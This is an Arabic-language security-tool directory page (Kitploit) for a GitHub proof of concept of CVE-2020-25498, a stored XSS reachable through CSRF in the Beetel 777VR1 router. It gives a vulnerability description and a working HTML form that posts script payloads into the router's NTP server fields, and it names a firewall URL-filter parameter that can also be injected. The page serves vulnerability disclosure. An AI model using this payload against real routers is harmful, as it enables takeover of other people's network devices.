Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-25498 — Stored XSS عبر CSRF في راوتر Beetel 777VR1 | Kitploit
أدوات/GitHubGitHub/the-girl-who-lived/cve-2020-25498
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

Stored XSS عبر CSRF في راوتر Beetel 777VR1

عرض المستودع
33منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-25498: ثغرة XSS مخزنة عبر CSRF في موجه Beetel 777VR1

وصف الثغرة

تم تحديد أن نقطة النهاية الضعيفة لا تحتوي على التحقق من صحة الإدخال من جانب الخادم وتفتقر إلى التصفية من جانب العميل لأي حقن نص برمجي خبيث. يمكن للمهاجم استخدام هذه الثغرة لحقن نص برمجي خبيث في نقطة النهاية ويتم تنشيط النص البرمجي في كل مرة يفتح فيها المستخدم نقطة النهاية الضعيفة. يمكن للمهاجم إرسال رابط ضار مع حمولة طلب POST لتنفيذ XSS في وحدة الإدارة عبر CSRF للسيطرة على الجهاز وأخيرًا، للسيطرة على الشبكة.

الباحث: Sayli Ambure (https://twitter.com/sayli_ambure)

رابط CVE في MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

إثبات المفهوم (PoC):

كود HTML لـ CSRF:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. اسم خادم NTP في وحدة تكوين وقت النظام

المعامل: اسم الخادم

فيديو إثبات المفهوم:

2. نقطة نهاية تصفية URL في وحدة جدار الحماية

المعامل: الكلمة المفتاحية

فيديو إثبات المفهوم:

تنزيل الأداة